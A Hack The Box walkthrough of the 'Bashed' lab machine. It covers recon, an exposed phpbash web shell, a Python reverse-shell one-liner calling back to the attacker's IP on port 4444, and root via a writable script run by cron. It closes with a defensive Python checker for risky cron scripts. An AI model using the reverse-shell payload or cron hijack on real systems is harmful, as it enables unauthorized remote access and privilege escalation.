Hack The Box Walkthrough: Bashed

Abhijith Kumar
3 min read · Mar 20, 2023


In this post, we will go through the HTB machine called Bashed.

Run nmap on the target.

sudo nmap -sV -sC -oA nmap/bashed 10.10.10.68

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-13 10:41 EDT
Nmap scan report for 10.10.10.68
Host is up (0.15s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel’s Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.12 seconds

On navigating to the website we get the following page.

On clicking the button, we are taken to /single.html, where the link to the GitHub repository is given. Let's clone the repository to our local system.

I didn't find anything that I can possibly exploit, except that the code itself is meant to execute commands on the target. Our next step would be to find where phpbash.php is located.

For this you can run any directory enumeration tool. I personally use gobuster for this.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 10.10.10.68 | tee directories.txt

The output shows a route to /dev. We can see that there is a file called phpbash.php, and on clicking it we get to the online terminal.

To get the user flag type:

cat /home/arrexel/user.txt

It would be convenient to get a reverse shell at this point. Go to revshells.com and enter your local IP and port at which you want the connection to be made. Choose the language as python.

We get the following payload that we have to enter in the target machine.

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("[YOUR_IP_ADDRESS]",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'

Make sure that you have netcat listening on port 4444 on your local machine.

Once we get the shell, we should modify it to make it interactive.

python -c 'import pty; pty.spawn("/bin/bash");'

Press Ctrl+Z to suspend the shell, then enter the following commands in sequence:

stty -echo raw

fg

export TERM=screen

stty rows 54 columns 134

Once we get the interactive shell, type 'sudo -l'.

We can run commands as the scriptmanager user. If you go to /, you will see a folder called scripts. On trying to list its contents we are unable to see anything inside. Running 'ls -dl /scripts' tells us that the scriptmanager user owns the directory.

Enter the following command to view the content of /scripts:

sudo -u scriptmanager ls /scripts

The folder has two files called test.py and test.txt. We can view the contents of test.py.

sudo -u scriptmanager cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

We can see that test.py is used to write "testing 123!" to test.txt. If you look at the timestamp next to test.txt in the ls output, you can see that it is much more recent than test.py, and the owner of test.txt is root. From this we can assume that there may be a cron job run by the root user that executes test.py at a set interval.

We can comment out all the code in test.py and add the python3 reverse shell payload that we got from revshells.com. Make sure not to use port 4444, as it is already in use.

Once you add the payload to test.py and start netcat on your local machine, you will get a root shell in a minute or two. The root flag is located at /root/root.txt.
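The misconfiguration this box ends on is a root cron job executing a script that lives in a directory owned by a less-privileged user. As an added defensive check (not part of the original walkthrough and not the box's own code), the Python below resolves the script behind a crontab command and reports why a non-root account could alter it; the crontab entry, the uid 1001 for scriptmanager and the file modes are constructed values.

```python
import os
import stat
from typing import List

# Interpreters whose first argument is the script actually executed.
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl"}

def cron_script(cmd: str) -> str:
    """Resolve the script a crontab command runs, honouring a leading 'cd DIR &&'."""
    cwd = "/"
    parts = [p.strip() for p in cmd.split("&&")]
    if len(parts) > 1 and parts[0].startswith("cd "):
        cwd = parts[0][3:].strip()
        parts = parts[1:]
    words = parts[-1].split()
    uses_interp = len(words) > 1 and os.path.basename(words[0]) in INTERPRETERS
    script = words[1] if uses_interp else words[0]
    return os.path.normpath(os.path.join(cwd, script))

def assess(path: str, file_uid: int, file_mode: int, dir_uid: int, dir_mode: int) -> List[str]:
    """List the ways a non-root user could rewrite a script that root's cron runs.

    file_*/dir_* are st_uid/st_mode of the script and of its parent directory,
    passed in explicitly so the logic can be exercised on constructed values.
    """
    parent = os.path.dirname(path) or "/"
    findings = []
    if file_uid != 0:
        findings.append(f"{path}: owned by uid {file_uid}, not root, so that user can edit it")
    if file_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: group/world writable (mode {stat.S_IMODE(file_mode):04o})")
    if dir_uid != 0:
        findings.append(f"{parent}: owned by uid {dir_uid}, not root, so that user can replace the script")
    if dir_mode & (stat.S_IWGRP | stat.S_IWOTH) and not dir_mode & stat.S_ISVTX:
        findings.append(f"{parent}: group/world writable without the sticky bit")
    return findings

def assess_path(path: str) -> List[str]:
    """Stat a real script and its parent directory, then run assess() on them."""
    st, dst = os.stat(path), os.stat(os.path.dirname(path) or "/")
    return assess(path, st.st_uid, st.st_mode, dst.st_uid, dst.st_mode)

if __name__ == "__main__":
    # Constructed crontab entry mirroring the Bashed setup: root runs test.py from
    # /scripts, while the file and the directory belong to scriptmanager (uid 1001 assumed).
    target = cron_script("cd /scripts && python test.py")
    for line in assess(target, 1001, 0o100644, 1001, 0o40755):
        print(line)
```

Running assess_path() over every script referenced from /etc/crontab and /etc/cron.d on a live host gives the same report for real files; an empty list means root-owned, non-writable script and directory.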
